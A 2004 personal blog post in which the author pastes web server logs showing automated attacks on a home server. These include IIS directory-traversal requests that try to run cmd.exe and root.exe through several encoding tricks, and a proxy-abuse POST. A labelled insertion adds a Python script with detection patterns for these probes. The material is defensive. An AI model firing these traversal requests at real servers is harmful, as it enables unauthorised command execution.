life continues


Worked many hours this week, trying to get new work web site finished.

So this evening I cycled to the pool and did an hour's training. I'm now tired and chlorinated, but very relaxed.

---
My web server went off on one at 2am the other night (just when I was thinking of going to sleep), thrashing its hdd. Think someone was trying to hack into it with a buffer overflow. Here's the log:

4.227.111.174 - - [09/Sep/2004:02:22:01 +0100] "POST http://4.227.111.174:25/ HTTP/1.1" 200 480 "-" "-"

Sods.

Looking at my logs, the server was subject to a few attempts within hours of it coming online.
Much more than my hosted site. Guess it's people running nmap against ADSL dial-up IP ranges and getting all excited by the prospect of an open port 80.

Here's a classic example:

81.70.101.40 - - [05/Sep/2004:17:37:46 +0100] "GET /.hash=eb649e3d22cdb034d91b64d4c11215f83a7e2fda HTTP/1.1" 404 372 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:26 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 381 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 381 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 397 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 354 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 354 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"
81.215.120.25 - - [07/Sep/2004:12:59:20 +0100] "GET /.hash=cf770b6f55e15660d70f00542bd58efeb7a8487f HTTP/1.1" 404 372 "-" "-"
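
Added example (not part of the original post): a small Python triage script that percent-decodes each request target until it stops changing and flags the probe patterns visible in the log above (double encoding such as `%255c`, overlong UTF-8 bytes such as `%c0%af`, `..` traversal, and `cmd.exe`/`root.exe`). The function names and reason labels are hypothetical; the sample lines reuse request targets from the log with documentation-range client addresses.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Apache common/combined log format: client, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def decode_fully(target, max_rounds=5):
    """Percent-decode until stable; return (bytes, rounds that changed it)."""
    data, rounds = target.encode(), 0
    for _ in range(max_rounds):
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(target):
    """Return the set of reasons a request target looks like an IIS probe."""
    raw, rounds = decode_fully(target)
    reasons = set()
    if rounds >= 2:                      # e.g. %255c -> %5c -> backslash
        reasons.add("double-encoded")
    if re.search(rb"[\xc0\xc1]", raw):   # lead bytes never valid in UTF-8
        reasons.add("overlong-utf8")
    if re.search(rb"\.\.[/\\\xc0\xc1]", raw):
        reasons.add("traversal")
    if re.search(rb"(cmd|root)\.exe", raw, re.I):
        reasons.add("windows-shell")
    return reasons

def scan(log_text):
    """Map client address -> sorted probe reasons seen across its requests."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            hits[m.group(1)] |= classify(m.group(3))
    return {ip: sorted(r) for ip, r in hits.items() if r}

# Constructed sample: targets from the log above, documentation-range clients.
SAMPLE = """\
192.0.2.10 - - [06/Sep/2004:18:08:26 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
192.0.2.10 - - [06/Sep/2004:18:08:28 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"
192.0.2.10 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"
198.51.100.7 - - [06/Sep/2004:18:09:00 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "-"
"""
if __name__ == "__main__":
    print(scan(SAMPLE))
```

All of the probes in the log returned 404 or 400, so a report like this is mainly useful for spotting the same client cycling through encodings of one path.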

---

By the way, if you think nmap is very uncool to know about, may I direct you to the news article on nmap's site which shows Trinity actually doing a real hacking attack in the film Matrix Reloaded:
http://www.insecure.org/

